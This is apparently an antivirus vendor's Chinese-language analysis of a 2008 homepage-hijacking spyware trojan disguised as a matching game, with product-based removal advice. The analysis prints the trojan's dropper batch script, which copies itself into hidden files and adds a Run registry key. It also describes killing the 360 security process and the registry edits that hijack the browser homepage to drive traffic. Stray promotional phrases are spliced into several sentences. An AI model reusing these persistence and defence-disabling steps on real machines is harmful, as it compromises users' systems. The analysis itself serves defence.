捕获时间
2008-10-16
病毒摘要
该样本是使用“vb”编写的“间谍程序”,由微点主动防御软件自动捕获,长度为“57,344 字节”,图标为,使用“exe”扩展名并模拟“连连看”版本信息,通过“网页木马”、“诱惑用户下载”等途径植入用户计算机,病毒主要修改用户ag旗舰厅首页主页为指定网站刷流量。
感染对象
windows 2000/windows xp/windows 2003
传播途径
网页木马、文件捆绑
防范措施
已安装使用微点主动防御软件的用户,无须任何设置,微点主动防御将自动保护您的系统免受该病毒的入侵和破坏。无论您是否已经升级到最新版本,微点主动防御都能够有效清除该病毒。如果您没有将微点主动防御软件升级到最新版,微点主动防御软件在发现该病毒后将报警提示您发现“未知木马”,请直接选择删除处理(如图1);
图1 主动防御自动捕获未知病毒(未升级)
如果您已经将微点主动防御软件升级到最新版本,微点将报警提示您发现"trojan-spy.win32.startpage.l”,请直接选择删除(如图2)。
图2 升级后截获已知病毒
对于未使用微点主动防御软件的用户,微点反病毒专家建议:
1、不要在不明站点下载非官方版本的软件进行安装,避免病毒通过捆绑的方式进入您的系统。
2、尽快将您的杀毒软件特征库升级到最新版本进行查杀,并开启防火墙拦截网络异常访问,如依然有异常情况请注意及时与专业的安全软件厂商联系获取ag旗舰厅首页的技术支持。
3、开启windows自动更新,及时打好漏洞补丁。
病毒分析
该样本程序被执行后,释放批处理文件“boot.bat”并执行,其批处理文件的内容如下:
|
@echo off
color 0a
copy sample.exe c:\scvshto.exe >nul
copy sample.exe d:\连连看2.3.exe >nul
attrib r s h c:\scvshto.exe >nul
@reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v scvshto /t reg_sz /d c:\scvshto.exe /f
del %0 |
|
批处理被执行后会在c盘和d盘根目录下生成病毒副本“scvshto.exe”与“连连看2.3.exe”,设置“scvshto.exe”属性为“只读”、“系统”、“隐藏”,并修改注册表实现开机自启动。
病毒主程序运行后,在c盘根目录下释放病毒文件“notoped.exe”,并创建该进程与“scvshto.exe”进程互相守护,设置其属性为“系统”、“隐藏”;修改如下注册表使其开机自启动:
项:
|
hkey_local_machine\software\microsoft\windows\currentversion\run
键值:pagofile
指向数据:c:\notoped.exe |
|
病毒文件“notoped.exe”运行后,循环遍历进程查找“360tray.exe”,找到后将其关闭;修改如下注册表隐藏原ie快捷方式:
项:
|
hkey_current_user\software\microsoft\windows\currentversion\explorer\hidedesktopicons\classicstartmenu
键值:{871c5380-42a0-1069-a2ea-08002b30309d}
指向数据:01 |
|
生成新ie快捷方式并修改如下注册表设置ie默认ag旗舰厅首页主页。
项:
|
hkey_current_user\software\microsoft\internet explorer\main
键值:start page
指向数据:http://www.dxcpm.com/?55_当前日期时间 |
|
设置定时器定期访问如下网页:
|
http://gp.dxcpm.com/ete.htm
http://www.dxcpm.com/sogou.htm |
|
访问 http://tj.boxcpm.cn/tj.aspx? 55_当前日期时间 进行访问统计。